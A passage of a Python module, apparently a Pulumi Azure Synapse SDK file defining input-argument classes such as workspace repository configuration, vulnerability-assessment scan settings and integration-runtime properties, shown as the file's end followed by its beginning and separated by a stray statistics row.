        if compute_subnet_id is None:
            return
        pulumi.set(__self__, "compute_subnet_id", compute_subnet_id)

    @property
    @pulumi.getter(name="computeSubnetId")
    def compute_subnet_id(self) -> Optional[pulumi.Input[str]]:
        """Subnet ID used for computes in workspace"""
        return pulumi.get(self, "compute_subnet_id")

    @compute_subnet_id.setter
    def compute_subnet_id(self, value: Optional[pulumi.Input[str]]) -> None:
        pulumi.set(self, "compute_subnet_id", value)
@pulumi.input_type
class VulnerabilityAssessmentRecurringScansPropertiesArgs:
    def __init__(__self__, *,
                 email_subscription_admins: Optional[pulumi.Input[bool]] = None,
                 emails: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 is_enabled: Optional[pulumi.Input[bool]] = None):
        """
        Properties of a Vulnerability Assessment recurring scans.

        :param pulumi.Input[bool] email_subscription_admins: Specifies that the schedule scan notification will be is sent to the subscription administrators.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] emails: Specifies an array of e-mail addresses to which the scan notification is sent.
        :param pulumi.Input[bool] is_enabled: Recurring scans state.
        """
        # Default to notifying subscription admins when not specified. After
        # defaulting, the value can never be None, so it is stored
        # unconditionally (the generated original re-checked `is not None`,
        # which was a dead branch).
        if email_subscription_admins is None:
            email_subscription_admins = True
        pulumi.set(__self__, "email_subscription_admins", email_subscription_admins)
        if emails is not None:
            pulumi.set(__self__, "emails", emails)
        if is_enabled is not None:
            pulumi.set(__self__, "is_enabled", is_enabled)

    @property
    @pulumi.getter(name="emailSubscriptionAdmins")
    def email_subscription_admins(self) -> Optional[pulumi.Input[bool]]:
        """
        Specifies that the schedule scan notification will be is sent to the subscription administrators.
        """
        return pulumi.get(self, "email_subscription_admins")

    @email_subscription_admins.setter
    def email_subscription_admins(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "email_subscription_admins", value)

    @property
    @pulumi.getter
    def emails(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Specifies an array of e-mail addresses to which the scan notification is sent.
        """
        return pulumi.get(self, "emails")

    @emails.setter
    def emails(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "emails", value)

    @property
    @pulumi.getter(name="isEnabled")
    def is_enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Recurring scans state.
        """
        return pulumi.get(self, "is_enabled")

    @is_enabled.setter
    def is_enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "is_enabled", value)
@pulumi.input_type
class WorkspaceKeyDetailsArgs:
    def __init__(__self__, *,
                 key_vault_url: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None):
        """
        Details of the customer managed key associated with the workspace.
        :param pulumi.Input[str] key_vault_url: Workspace Key sub-resource key vault url
        :param pulumi.Input[str] name: Workspace Key sub-resource name
        """
        # Record only the arguments the caller actually supplied.
        for attr, supplied in (("key_vault_url", key_vault_url), ("name", name)):
            if supplied is not None:
                pulumi.set(__self__, attr, supplied)
    @property
    @pulumi.getter(name="keyVaultUrl")
    def key_vault_url(self) -> Optional[pulumi.Input[str]]:
        """
        Workspace Key sub-resource key vault url
        """
        return pulumi.get(self, "key_vault_url")
    @key_vault_url.setter
    def key_vault_url(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "key_vault_url", value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Workspace Key sub-resource name
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
@pulumi.input_type
class WorkspaceRepositoryConfigurationArgs:
    def __init__(__self__, *,
                 account_name: Optional[pulumi.Input[str]] = None,
                 client_id: Optional[pulumi.Input[str]] = None,
                 client_secret: Optional[pulumi.Input['GitHubClientSecretArgs']] = None,
                 collaboration_branch: Optional[pulumi.Input[str]] = None,
                 host_name: Optional[pulumi.Input[str]] = None,
                 last_commit_id: Optional[pulumi.Input[str]] = None,
                 project_name: Optional[pulumi.Input[str]] = None,
                 repository_name: Optional[pulumi.Input[str]] = None,
                 root_folder: Optional[pulumi.Input[str]] = None,
                 tenant_id: Optional[pulumi.Input[str]] = None,
                 type: Optional[pulumi.Input[str]] = None):
        """
        Git integration settings
        :param pulumi.Input[str] account_name: Account name
        :param pulumi.Input[str] client_id: GitHub bring your own app client id
        :param pulumi.Input['GitHubClientSecretArgs'] client_secret: GitHub bring your own app client secret information.
        :param pulumi.Input[str] collaboration_branch: Collaboration branch
        :param pulumi.Input[str] host_name: GitHub Enterprise host name. For example: https://github.mydomain.com
        :param pulumi.Input[str] last_commit_id: The last commit ID
        :param pulumi.Input[str] project_name: VSTS project name
        :param pulumi.Input[str] repository_name: Repository name
        :param pulumi.Input[str] root_folder: Root folder to use in the repository
        :param pulumi.Input[str] tenant_id: The VSTS tenant ID
        :param pulumi.Input[str] type: Type of workspace repositoryID configuration. Example WorkspaceVSTSConfiguration, WorkspaceGitHubConfiguration
        """
        # Table-driven storage: persist only the settings the caller supplied.
        supplied = (
            ("account_name", account_name),
            ("client_id", client_id),
            ("client_secret", client_secret),
            ("collaboration_branch", collaboration_branch),
            ("host_name", host_name),
            ("last_commit_id", last_commit_id),
            ("project_name", project_name),
            ("repository_name", repository_name),
            ("root_folder", root_folder),
            ("tenant_id", tenant_id),
            ("type", type),
        )
        for attr, val in supplied:
            if val is not None:
                pulumi.set(__self__, attr, val)
    @property
    @pulumi.getter(name="accountName")
    def account_name(self) -> Optional[pulumi.Input[str]]:
        """
        Account name
        """
        return pulumi.get(self, "account_name")
    @account_name.setter
    def account_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "account_name", value)
    @property
    @pulumi.getter(name="clientId")
    def client_id(self) -> Optional[pulumi.Input[str]]:
        """
        GitHub bring your own app client id
        """
        return pulumi.get(self, "client_id")
    @client_id.setter
    def client_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "client_id", value)
    @property
    @pulumi.getter(name="clientSecret")
    def client_secret(self) -> Optional[pulumi.Input['GitHubClientSecretArgs']]:
        """
        GitHub bring your own app client secret information.
        """
        return pulumi.get(self, "client_secret")
    @client_secret.setter
    def client_secret(self, value: Optional[pulumi.Input['GitHubClientSecretArgs']]):
        pulumi.set(self, "client_secret", value)
    @property
    @pulumi.getter(name="collaborationBranch")
    def collaboration_branch(self) -> Optional[pulumi.Input[str]]:
        """
        Collaboration branch
        """
        return pulumi.get(self, "collaboration_branch")
    @collaboration_branch.setter
    def collaboration_branch(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "collaboration_branch", value)
    @property
    @pulumi.getter(name="hostName")
    def host_name(self) -> Optional[pulumi.Input[str]]:
        """
        GitHub Enterprise host name. For example: https://github.mydomain.com
        """
        return pulumi.get(self, "host_name")
    @host_name.setter
    def host_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "host_name", value)
    @property
    @pulumi.getter(name="lastCommitId")
    def last_commit_id(self) -> Optional[pulumi.Input[str]]:
        """
        The last commit ID
        """
        return pulumi.get(self, "last_commit_id")
    @last_commit_id.setter
    def last_commit_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "last_commit_id", value)
    @property
    @pulumi.getter(name="projectName")
    def project_name(self) -> Optional[pulumi.Input[str]]:
        """
        VSTS project name
        """
        return pulumi.get(self, "project_name")
    @project_name.setter
    def project_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "project_name", value)
    @property
    @pulumi.getter(name="repositoryName")
    def repository_name(self) -> Optional[pulumi.Input[str]]:
        """
        Repository name
        """
        return pulumi.get(self, "repository_name")
    @repository_name.setter
    def repository_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "repository_name", value)
    @property
    @pulumi.getter(name="rootFolder")
    def root_folder(self) -> Optional[pulumi.Input[str]]:
        """
        Root folder to use in the repository
        """
        return pulumi.get(self, "root_folder")
    @root_folder.setter
    def root_folder(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "root_folder", value)
    @property
    @pulumi.getter(name="tenantId")
    def tenant_id(self) -> Optional[pulumi.Input[str]]:
        """
        The VSTS tenant ID
        """
        return pulumi.get(self, "tenant_id")
    @tenant_id.setter
    def tenant_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "tenant_id", value)
    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        """
        Type of workspace repositoryID configuration. Example WorkspaceVSTSConfiguration, WorkspaceGitHubConfiguration
        """
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)
| 39.099005 | 247 | 0.663935 |
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from ._enums import *
__all__ = [
'AutoPausePropertiesArgs',
'AutoScalePropertiesArgs',
'CmdkeySetupArgs',
'ComponentSetupArgs',
'CustomerManagedKeyDetailsArgs',
'DataLakeStorageAccountDetailsArgs',
'DynamicExecutorAllocationArgs',
'EncryptionDetailsArgs',
'EntityReferenceArgs',
'EnvironmentVariableSetupArgs',
'GitHubClientSecretArgs',
'IntegrationRuntimeComputePropertiesArgs',
'IntegrationRuntimeCustomSetupScriptPropertiesArgs',
'IntegrationRuntimeDataFlowPropertiesArgs',
'IntegrationRuntimeDataProxyPropertiesArgs',
'IntegrationRuntimeSsisCatalogInfoArgs',
'IntegrationRuntimeSsisPropertiesArgs',
'IntegrationRuntimeVNetPropertiesArgs',
'LibraryInfoArgs',
'LibraryRequirementsArgs',
'LinkedIntegrationRuntimeKeyAuthorizationArgs',
'LinkedIntegrationRuntimeRbacAuthorizationArgs',
'ManagedIdentityArgs',
'ManagedIntegrationRuntimeArgs',
'ManagedVirtualNetworkReferenceArgs',
'ManagedVirtualNetworkSettingsArgs',
'PrivateEndpointConnectionArgs',
'PrivateLinkServiceConnectionStateArgs',
'PurviewConfigurationArgs',
'SecureStringArgs',
'SelfHostedIntegrationRuntimeArgs',
'SkuArgs',
'SqlPoolVulnerabilityAssessmentRuleBaselineItemArgs',
'VirtualNetworkProfileArgs',
'VulnerabilityAssessmentRecurringScansPropertiesArgs',
'WorkspaceKeyDetailsArgs',
'WorkspaceRepositoryConfigurationArgs',
]
@pulumi.input_type
class AutoPausePropertiesArgs:
    def __init__(__self__, *,
                 delay_in_minutes: Optional[pulumi.Input[int]] = None,
                 enabled: Optional[pulumi.Input[bool]] = None):
        """
        Auto-pause settings.
        :param pulumi.Input[int] delay_in_minutes: Delay, in minutes.
        :param pulumi.Input[bool] enabled: Whether auto-pause is enabled.
        """
        # Store only the values the caller explicitly provided.
        for attr, supplied in (("delay_in_minutes", delay_in_minutes), ("enabled", enabled)):
            if supplied is not None:
                pulumi.set(__self__, attr, supplied)
    @property
    @pulumi.getter(name="delayInMinutes")
    def delay_in_minutes(self) -> Optional[pulumi.Input[int]]:
        """
        Delay, in minutes.
        """
        return pulumi.get(self, "delay_in_minutes")
    @delay_in_minutes.setter
    def delay_in_minutes(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "delay_in_minutes", value)
    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether auto-pause is enabled.
        """
        return pulumi.get(self, "enabled")
    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)
@pulumi.input_type
class AutoScalePropertiesArgs:
    def __init__(__self__, *,
                 enabled: Optional[pulumi.Input[bool]] = None,
                 max_node_count: Optional[pulumi.Input[int]] = None,
                 min_node_count: Optional[pulumi.Input[int]] = None):
        """
        Auto-scale settings.
        :param pulumi.Input[bool] enabled: Whether auto-scale is enabled.
        :param pulumi.Input[int] max_node_count: Maximum node count.
        :param pulumi.Input[int] min_node_count: Minimum node count.
        """
        if enabled is not None:
            pulumi.set(__self__, "enabled", enabled)
        if max_node_count is not None:
            pulumi.set(__self__, "max_node_count", max_node_count)
        if min_node_count is not None:
            pulumi.set(__self__, "min_node_count", min_node_count)
    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether auto-scale is enabled.
        """
        return pulumi.get(self, "enabled")
    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)
    @property
    @pulumi.getter(name="maxNodeCount")
    def max_node_count(self) -> Optional[pulumi.Input[int]]:
        """
        Maximum node count.
        """
        return pulumi.get(self, "max_node_count")
    @max_node_count.setter
    def max_node_count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "max_node_count", value)
    @property
    @pulumi.getter(name="minNodeCount")
    def min_node_count(self) -> Optional[pulumi.Input[int]]:
        """
        Minimum node count.
        """
        return pulumi.get(self, "min_node_count")
    @min_node_count.setter
    def min_node_count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "min_node_count", value)
@pulumi.input_type
class CmdkeySetupArgs:
    def __init__(__self__, *,
                 password: pulumi.Input['SecureStringArgs'],
                 target_name: Any,
                 type: pulumi.Input[str],
                 user_name: Any):
        """
        Arguments for a custom-setup step whose discriminator is 'CmdkeySetup'.
        :param pulumi.Input['SecureStringArgs'] password: Secure password value.
        :param Any target_name: Target name (arbitrary value, typed ``Any``).
        :param pulumi.Input[str] type: Type discriminator; the constructor always stores 'CmdkeySetup' regardless of the value passed.
        :param Any user_name: User name (arbitrary value, typed ``Any``).
        """
        pulumi.set(__self__, "password", password)
        pulumi.set(__self__, "target_name", target_name)
        # The discriminator is pinned; the caller-supplied ``type`` is ignored.
        pulumi.set(__self__, "type", 'CmdkeySetup')
        pulumi.set(__self__, "user_name", user_name)
    @property
    @pulumi.getter
    def password(self) -> pulumi.Input['SecureStringArgs']:
        """Secure password value."""
        return pulumi.get(self, "password")
    @password.setter
    def password(self, value: pulumi.Input['SecureStringArgs']):
        pulumi.set(self, "password", value)
    @property
    @pulumi.getter(name="targetName")
    def target_name(self) -> Any:
        """Target name (arbitrary value)."""
        return pulumi.get(self, "target_name")
    @target_name.setter
    def target_name(self, value: Any):
        pulumi.set(self, "target_name", value)
    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """Type discriminator; set to 'CmdkeySetup' by the constructor."""
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)
    @property
    @pulumi.getter(name="userName")
    def user_name(self) -> Any:
        """User name (arbitrary value)."""
        return pulumi.get(self, "user_name")
    @user_name.setter
    def user_name(self, value: Any):
        pulumi.set(self, "user_name", value)
@pulumi.input_type
class ComponentSetupArgs:
    def __init__(__self__, *,
                 component_name: pulumi.Input[str],
                 type: pulumi.Input[str],
                 license_key: Optional[pulumi.Input['SecureStringArgs']] = None):
        """
        Arguments for a custom-setup step whose discriminator is 'ComponentSetup'.
        :param pulumi.Input[str] component_name: Name of the component.
        :param pulumi.Input[str] type: Type discriminator; the constructor always stores 'ComponentSetup' regardless of the value passed.
        :param pulumi.Input['SecureStringArgs'] license_key: Optional secure license key.
        """
        pulumi.set(__self__, "component_name", component_name)
        # The discriminator is pinned; the caller-supplied ``type`` is ignored.
        pulumi.set(__self__, "type", 'ComponentSetup')
        if license_key is not None:
            pulumi.set(__self__, "license_key", license_key)
    @property
    @pulumi.getter(name="componentName")
    def component_name(self) -> pulumi.Input[str]:
        """Name of the component."""
        return pulumi.get(self, "component_name")
    @component_name.setter
    def component_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "component_name", value)
    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """Type discriminator; set to 'ComponentSetup' by the constructor."""
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)
    @property
    @pulumi.getter(name="licenseKey")
    def license_key(self) -> Optional[pulumi.Input['SecureStringArgs']]:
        """Optional secure license key."""
        return pulumi.get(self, "license_key")
    @license_key.setter
    def license_key(self, value: Optional[pulumi.Input['SecureStringArgs']]):
        pulumi.set(self, "license_key", value)
@pulumi.input_type
class CustomerManagedKeyDetailsArgs:
    def __init__(__self__, *,
                 key: Optional[pulumi.Input['WorkspaceKeyDetailsArgs']] = None):
        """
        Customer-managed key details.
        :param pulumi.Input['WorkspaceKeyDetailsArgs'] key: The workspace key sub-resource, if any.
        """
        # Guard clause: nothing to record when no key was supplied.
        if key is None:
            return
        pulumi.set(__self__, "key", key)
    @property
    @pulumi.getter
    def key(self) -> Optional[pulumi.Input['WorkspaceKeyDetailsArgs']]:
        """The workspace key sub-resource, if any."""
        return pulumi.get(self, "key")
    @key.setter
    def key(self, value: Optional[pulumi.Input['WorkspaceKeyDetailsArgs']]):
        pulumi.set(self, "key", value)
@pulumi.input_type
class DataLakeStorageAccountDetailsArgs:
    def __init__(__self__, *,
                 account_url: Optional[pulumi.Input[str]] = None,
                 filesystem: Optional[pulumi.Input[str]] = None):
        """
        Details of a Data Lake storage account.
        :param pulumi.Input[str] account_url: URL of the storage account.
        :param pulumi.Input[str] filesystem: Filesystem name.
        """
        if account_url is not None:
            pulumi.set(__self__, "account_url", account_url)
        if filesystem is not None:
            pulumi.set(__self__, "filesystem", filesystem)
    @property
    @pulumi.getter(name="accountUrl")
    def account_url(self) -> Optional[pulumi.Input[str]]:
        """URL of the storage account."""
        return pulumi.get(self, "account_url")
    @account_url.setter
    def account_url(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "account_url", value)
    @property
    @pulumi.getter
    def filesystem(self) -> Optional[pulumi.Input[str]]:
        """Filesystem name."""
        return pulumi.get(self, "filesystem")
    @filesystem.setter
    def filesystem(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "filesystem", value)
@pulumi.input_type
class DynamicExecutorAllocationArgs:
    def __init__(__self__, *,
                 enabled: Optional[pulumi.Input[bool]] = None):
        """
        Dynamic executor allocation settings.
        :param pulumi.Input[bool] enabled: Whether dynamic executor allocation is enabled.
        """
        # Guard clause: record the flag only when it was supplied.
        if enabled is None:
            return
        pulumi.set(__self__, "enabled", enabled)
    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        """Whether dynamic executor allocation is enabled."""
        return pulumi.get(self, "enabled")
    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)
@pulumi.input_type
class EncryptionDetailsArgs:
    def __init__(__self__, *,
                 cmk: Optional[pulumi.Input['CustomerManagedKeyDetailsArgs']] = None):
        """
        Encryption details.
        :param pulumi.Input['CustomerManagedKeyDetailsArgs'] cmk: Customer-managed key details, if any.
        """
        if cmk is not None:
            pulumi.set(__self__, "cmk", cmk)
    @property
    @pulumi.getter
    def cmk(self) -> Optional[pulumi.Input['CustomerManagedKeyDetailsArgs']]:
        """Customer-managed key details, if any."""
        return pulumi.get(self, "cmk")
    @cmk.setter
    def cmk(self, value: Optional[pulumi.Input['CustomerManagedKeyDetailsArgs']]):
        pulumi.set(self, "cmk", value)
@pulumi.input_type
class EntityReferenceArgs:
    def __init__(__self__, *,
                 reference_name: Optional[pulumi.Input[str]] = None,
                 type: Optional[pulumi.Input[Union[str, 'IntegrationRuntimeEntityReferenceType']]] = None):
        """
        Reference to another entity by name and type.
        :param pulumi.Input[str] reference_name: Name of the referenced entity.
        :param pulumi.Input[Union[str, 'IntegrationRuntimeEntityReferenceType']] type: Kind of the referenced entity.
        """
        if reference_name is not None:
            pulumi.set(__self__, "reference_name", reference_name)
        if type is not None:
            pulumi.set(__self__, "type", type)
    @property
    @pulumi.getter(name="referenceName")
    def reference_name(self) -> Optional[pulumi.Input[str]]:
        """Name of the referenced entity."""
        return pulumi.get(self, "reference_name")
    @reference_name.setter
    def reference_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "reference_name", value)
    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[Union[str, 'IntegrationRuntimeEntityReferenceType']]]:
        """Kind of the referenced entity."""
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: Optional[pulumi.Input[Union[str, 'IntegrationRuntimeEntityReferenceType']]]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class EnvironmentVariableSetupArgs:
    def __init__(__self__, *,
                 type: pulumi.Input[str],
                 variable_name: pulumi.Input[str],
                 variable_value: pulumi.Input[str]):
        """
        Arguments for a custom-setup step whose discriminator is 'EnvironmentVariableSetup'.
        :param pulumi.Input[str] type: Type discriminator; the constructor always stores 'EnvironmentVariableSetup' regardless of the value passed.
        :param pulumi.Input[str] variable_name: Name of the environment variable.
        :param pulumi.Input[str] variable_value: Value of the environment variable.
        """
        # The discriminator is pinned; the caller-supplied ``type`` is ignored.
        pulumi.set(__self__, "type", 'EnvironmentVariableSetup')
        pulumi.set(__self__, "variable_name", variable_name)
        pulumi.set(__self__, "variable_value", variable_value)
    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """Type discriminator; set to 'EnvironmentVariableSetup' by the constructor."""
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)
    @property
    @pulumi.getter(name="variableName")
    def variable_name(self) -> pulumi.Input[str]:
        """Name of the environment variable."""
        return pulumi.get(self, "variable_name")
    @variable_name.setter
    def variable_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "variable_name", value)
    @property
    @pulumi.getter(name="variableValue")
    def variable_value(self) -> pulumi.Input[str]:
        """Value of the environment variable."""
        return pulumi.get(self, "variable_value")
    @variable_value.setter
    def variable_value(self, value: pulumi.Input[str]):
        pulumi.set(self, "variable_value", value)
@pulumi.input_type
class GitHubClientSecretArgs:
    def __init__(__self__, *,
                 byoa_secret_akv_url: Optional[pulumi.Input[str]] = None,
                 byoa_secret_name: Optional[pulumi.Input[str]] = None):
        """
        GitHub bring-your-own-app client secret information.
        :param pulumi.Input[str] byoa_secret_akv_url: Key-vault URL of the BYOA secret.
        :param pulumi.Input[str] byoa_secret_name: Name of the BYOA secret.
        """
        if byoa_secret_akv_url is not None:
            pulumi.set(__self__, "byoa_secret_akv_url", byoa_secret_akv_url)
        if byoa_secret_name is not None:
            pulumi.set(__self__, "byoa_secret_name", byoa_secret_name)
    @property
    @pulumi.getter(name="byoaSecretAkvUrl")
    def byoa_secret_akv_url(self) -> Optional[pulumi.Input[str]]:
        """Key-vault URL of the BYOA secret."""
        return pulumi.get(self, "byoa_secret_akv_url")
    @byoa_secret_akv_url.setter
    def byoa_secret_akv_url(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "byoa_secret_akv_url", value)
    @property
    @pulumi.getter(name="byoaSecretName")
    def byoa_secret_name(self) -> Optional[pulumi.Input[str]]:
        """Name of the BYOA secret."""
        return pulumi.get(self, "byoa_secret_name")
    @byoa_secret_name.setter
    def byoa_secret_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "byoa_secret_name", value)
@pulumi.input_type
class IntegrationRuntimeComputePropertiesArgs:
    def __init__(__self__, *,
                 data_flow_properties: Optional[pulumi.Input['IntegrationRuntimeDataFlowPropertiesArgs']] = None,
                 location: Optional[pulumi.Input[str]] = None,
                 max_parallel_executions_per_node: Optional[pulumi.Input[int]] = None,
                 node_size: Optional[pulumi.Input[str]] = None,
                 number_of_nodes: Optional[pulumi.Input[int]] = None,
                 v_net_properties: Optional[pulumi.Input['IntegrationRuntimeVNetPropertiesArgs']] = None):
        """
        Compute settings for an integration runtime.
        :param pulumi.Input['IntegrationRuntimeDataFlowPropertiesArgs'] data_flow_properties: Data-flow settings.
        :param pulumi.Input[str] location: Location of the compute.
        :param pulumi.Input[int] max_parallel_executions_per_node: Maximum parallel executions per node.
        :param pulumi.Input[str] node_size: Node size.
        :param pulumi.Input[int] number_of_nodes: Number of nodes.
        :param pulumi.Input['IntegrationRuntimeVNetPropertiesArgs'] v_net_properties: Virtual-network settings.
        """
        if data_flow_properties is not None:
            pulumi.set(__self__, "data_flow_properties", data_flow_properties)
        if location is not None:
            pulumi.set(__self__, "location", location)
        if max_parallel_executions_per_node is not None:
            pulumi.set(__self__, "max_parallel_executions_per_node", max_parallel_executions_per_node)
        if node_size is not None:
            pulumi.set(__self__, "node_size", node_size)
        if number_of_nodes is not None:
            pulumi.set(__self__, "number_of_nodes", number_of_nodes)
        if v_net_properties is not None:
            pulumi.set(__self__, "v_net_properties", v_net_properties)
    @property
    @pulumi.getter(name="dataFlowProperties")
    def data_flow_properties(self) -> Optional[pulumi.Input['IntegrationRuntimeDataFlowPropertiesArgs']]:
        """Data-flow settings."""
        return pulumi.get(self, "data_flow_properties")
    @data_flow_properties.setter
    def data_flow_properties(self, value: Optional[pulumi.Input['IntegrationRuntimeDataFlowPropertiesArgs']]):
        pulumi.set(self, "data_flow_properties", value)
    @property
    @pulumi.getter
    def location(self) -> Optional[pulumi.Input[str]]:
        """Location of the compute."""
        return pulumi.get(self, "location")
    @location.setter
    def location(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "location", value)
    @property
    @pulumi.getter(name="maxParallelExecutionsPerNode")
    def max_parallel_executions_per_node(self) -> Optional[pulumi.Input[int]]:
        """Maximum parallel executions per node."""
        return pulumi.get(self, "max_parallel_executions_per_node")
    @max_parallel_executions_per_node.setter
    def max_parallel_executions_per_node(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "max_parallel_executions_per_node", value)
    @property
    @pulumi.getter(name="nodeSize")
    def node_size(self) -> Optional[pulumi.Input[str]]:
        """Node size."""
        return pulumi.get(self, "node_size")
    @node_size.setter
    def node_size(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "node_size", value)
    @property
    @pulumi.getter(name="numberOfNodes")
    def number_of_nodes(self) -> Optional[pulumi.Input[int]]:
        """Number of nodes."""
        return pulumi.get(self, "number_of_nodes")
    @number_of_nodes.setter
    def number_of_nodes(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "number_of_nodes", value)
    @property
    @pulumi.getter(name="vNetProperties")
    def v_net_properties(self) -> Optional[pulumi.Input['IntegrationRuntimeVNetPropertiesArgs']]:
        """Virtual-network settings."""
        return pulumi.get(self, "v_net_properties")
    @v_net_properties.setter
    def v_net_properties(self, value: Optional[pulumi.Input['IntegrationRuntimeVNetPropertiesArgs']]):
        pulumi.set(self, "v_net_properties", value)
@pulumi.input_type
class IntegrationRuntimeCustomSetupScriptPropertiesArgs:
    def __init__(__self__, *,
                 blob_container_uri: Optional[pulumi.Input[str]] = None,
                 sas_token: Optional[pulumi.Input['SecureStringArgs']] = None):
        """
        Custom setup script settings for an integration runtime.
        :param pulumi.Input[str] blob_container_uri: URI of the blob container holding the script.
        :param pulumi.Input['SecureStringArgs'] sas_token: Secure SAS token for the container.
        """
        if blob_container_uri is not None:
            pulumi.set(__self__, "blob_container_uri", blob_container_uri)
        if sas_token is not None:
            pulumi.set(__self__, "sas_token", sas_token)
    @property
    @pulumi.getter(name="blobContainerUri")
    def blob_container_uri(self) -> Optional[pulumi.Input[str]]:
        """URI of the blob container holding the script."""
        return pulumi.get(self, "blob_container_uri")
    @blob_container_uri.setter
    def blob_container_uri(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "blob_container_uri", value)
    @property
    @pulumi.getter(name="sasToken")
    def sas_token(self) -> Optional[pulumi.Input['SecureStringArgs']]:
        """Secure SAS token for the container."""
        return pulumi.get(self, "sas_token")
    @sas_token.setter
    def sas_token(self, value: Optional[pulumi.Input['SecureStringArgs']]):
        pulumi.set(self, "sas_token", value)
@pulumi.input_type
class IntegrationRuntimeDataFlowPropertiesArgs:
    def __init__(__self__, *,
                 cleanup: Optional[pulumi.Input[bool]] = None,
                 compute_type: Optional[pulumi.Input[Union[str, 'DataFlowComputeType']]] = None,
                 core_count: Optional[pulumi.Input[int]] = None,
                 time_to_live: Optional[pulumi.Input[int]] = None):
        """
        Data-flow settings for an integration runtime.
        :param pulumi.Input[bool] cleanup: Cleanup flag.
        :param pulumi.Input[Union[str, 'DataFlowComputeType']] compute_type: Compute type.
        :param pulumi.Input[int] core_count: Core count.
        :param pulumi.Input[int] time_to_live: Time to live.
        """
        if cleanup is not None:
            pulumi.set(__self__, "cleanup", cleanup)
        if compute_type is not None:
            pulumi.set(__self__, "compute_type", compute_type)
        if core_count is not None:
            pulumi.set(__self__, "core_count", core_count)
        if time_to_live is not None:
            pulumi.set(__self__, "time_to_live", time_to_live)
    @property
    @pulumi.getter
    def cleanup(self) -> Optional[pulumi.Input[bool]]:
        """Cleanup flag."""
        return pulumi.get(self, "cleanup")
    @cleanup.setter
    def cleanup(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "cleanup", value)
    @property
    @pulumi.getter(name="computeType")
    def compute_type(self) -> Optional[pulumi.Input[Union[str, 'DataFlowComputeType']]]:
        """Compute type."""
        return pulumi.get(self, "compute_type")
    @compute_type.setter
    def compute_type(self, value: Optional[pulumi.Input[Union[str, 'DataFlowComputeType']]]):
        pulumi.set(self, "compute_type", value)
    @property
    @pulumi.getter(name="coreCount")
    def core_count(self) -> Optional[pulumi.Input[int]]:
        """Core count."""
        return pulumi.get(self, "core_count")
    @core_count.setter
    def core_count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "core_count", value)
    @property
    @pulumi.getter(name="timeToLive")
    def time_to_live(self) -> Optional[pulumi.Input[int]]:
        """Time to live."""
        return pulumi.get(self, "time_to_live")
    @time_to_live.setter
    def time_to_live(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "time_to_live", value)
@pulumi.input_type
class IntegrationRuntimeDataProxyPropertiesArgs:
    def __init__(__self__, *,
                 connect_via: Optional[pulumi.Input['EntityReferenceArgs']] = None,
                 path: Optional[pulumi.Input[str]] = None,
